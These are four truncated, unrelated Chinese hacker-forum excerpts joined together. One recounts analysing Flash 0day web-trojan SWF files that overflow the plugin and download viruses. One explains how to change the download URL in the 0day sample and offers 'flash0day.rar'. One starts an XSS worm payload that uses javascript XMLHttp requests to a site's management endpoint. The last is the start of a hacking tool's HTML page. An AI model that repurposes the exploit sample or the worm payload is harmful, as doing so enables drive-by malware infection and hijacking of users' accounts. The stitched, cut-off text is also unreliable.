最近FLASH出了几个0DAY,论坛也帖了相关的新闻信息(请见:http://bbs.tian6.com/viewthread.php?tid=4434&extra=&page=1).我也约在5天前开始对此进行研究.我记得同时间邪恶八进制也有人开始同样的研究.到目前为止,该0DAY可以影响到90.115这个版本.而邪八那边的研究,先在两天前宣布成功完成.这又给我带来不小的压力..(一)作为研究的初步,通过TIM的帮助,我从几个被挂马的页面得到2个SWF网马.反编译后得知这两个SWF在获得本地FLASH插件版本后,会再次下载2个真正具备溢出并且下载病毒到本地执行能力的恶意SWF文...

open写的。在这我就粗略说一下把那个ODAY的网址改为明文的方法。以我BLOG所上传的样本为例：定位到文件的FD位置后。把它改为51之后的下载网址你想改啥就啥原来:修改后:原来:修改后:下载地址：flash0day.rar...

文章作者：茄子宝信息来源：邪恶八进制信息安全团队（www.eviloctal.com）看到梦之光芒放出来了!我也不藏了!10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSS WORM初尝试的续吧.其实很简单,就是两次转码.<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S...

<html><head><metahttp-equiv="Content-Type"content="text/html;charset=gb2312"><title>CodzBy剑心</title><styletype="text/css">body,td{font-family:"Tahoma";font-size:"12px";line-height:"150%";}.smlfont{font-family:"Tahoma";font-size:"11px";}.INPUT{FONT-SIZE:"12px";COLO...